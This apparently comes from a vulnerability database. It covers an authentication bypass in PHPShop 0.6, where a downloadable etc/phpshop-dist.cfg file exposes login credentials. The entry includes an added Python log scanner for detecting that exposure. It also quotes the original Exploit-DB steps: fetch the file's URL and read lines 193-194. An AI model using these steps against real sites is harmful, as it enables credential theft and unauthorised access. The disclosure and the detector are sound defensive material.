vendor: PHPShop
by: indoushka
CVSS: 7.5 HIGH
Bypass Config
CWE: 287
Product Name: PHPShop
Affected Version From: 0.6
Affected Version To: 0.6
Patch Exists: NO
Related CWE: N/A
CPE: a:phpshop:phpshop:0.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2, Linux 9.4 Ubuntu
2009

PHPShop Version 0.6 by pass Vulnerability

The vulnerability allows an attacker to bypass authentication in PHPShop Version 0.6: the phpshop-dist.cfg file can be downloaded directly from the application's etc/ directory, and the login credentials are stored in it on lines 193 and 194.

Mitigation:

Ensure that the phpshop-dist.cfg file is not accessible to unauthorized users.
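
A defender-side check for the mitigation above, as an added example that is not part of the original advisory: it scans web server access-log lines for requests to phpshop-dist.cfg and separates those that were served from those that were refused. The Common/Combined Log Format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common/Combined Log Format (assumed): client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# The file named in the advisory; matched case-insensitively after URL-decoding.
CFG_NAME = "phpshop-dist.cfg"

def classify(line):
    """Return (ip, timestamp, verdict) for requests to the config file, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote(m["target"]).split("?", 1)[0].lower()
    if not path.endswith("/" + CFG_NAME):
        return None
    status = int(m["status"])
    # 2xx (or 304, meaning the client already holds a copy) means the file content
    # reached the client: treat the credentials in it as disclosed.
    verdict = "EXPOSED" if 200 <= status < 300 or status == 304 else "blocked"
    return m["ip"], m["ts"], verdict

def exposures(lines):
    """Split config-file requests into (served, refused) lists."""
    hits = [c for c in map(classify, lines) if c]
    return ([h for h in hits if h[2] == "EXPOSED"],
            [h for h in hits if h[2] == "blocked"])

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [16/Dec/2009:10:01:02 +0000] "GET /phpshop/index.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [16/Dec/2009:10:03:44 +0000] "GET /phpshop/etc/phpshop-dist.cfg HTTP/1.1" 200 9873',
    '203.0.113.9 - - [16/Dec/2009:10:03:50 +0000] "GET /phpshop/etc/PHPShop-dist%2Ecfg HTTP/1.1" 200 9873',
    '192.0.2.33 - - [17/Dec/2009:08:15:00 +0000] "GET /phpshop/etc/phpshop-dist.cfg HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    exposed, blocked = exposures(SAMPLE)
    for ip, ts, _ in exposed:
        print(f"EXPOSED  {ts}  {ip}  -> rotate the credentials stored in {CFG_NAME}")
    for ip, ts, _ in blocked:
        print(f"blocked  {ts}  {ip}")
```

Any line reported as EXPOSED means the credentials in the file should be changed, not only that access should be closed off.
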
Source

Exploit-DB raw data:

========================================================================================
| # Title    : PHPShop Version 0.6 by pass Vulnerability                               |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # EDB-ID   : 10677                                                                   |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # Date     :16/12/2009                                                               |
| # Verified :                                                                         |
| # Web Site : www.iq-ty.com                                                           |
| # Published:                                                                         |
| # Script   : PHPShop Version 0.6                                                     |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)       |
| # Bug      : by Pass Config                                                          |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://localhost/phpshop/etc/phpshop-dist.cfg * After download
| 2- open it and look in line: 193+194 you find the pass and e-mail to login
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------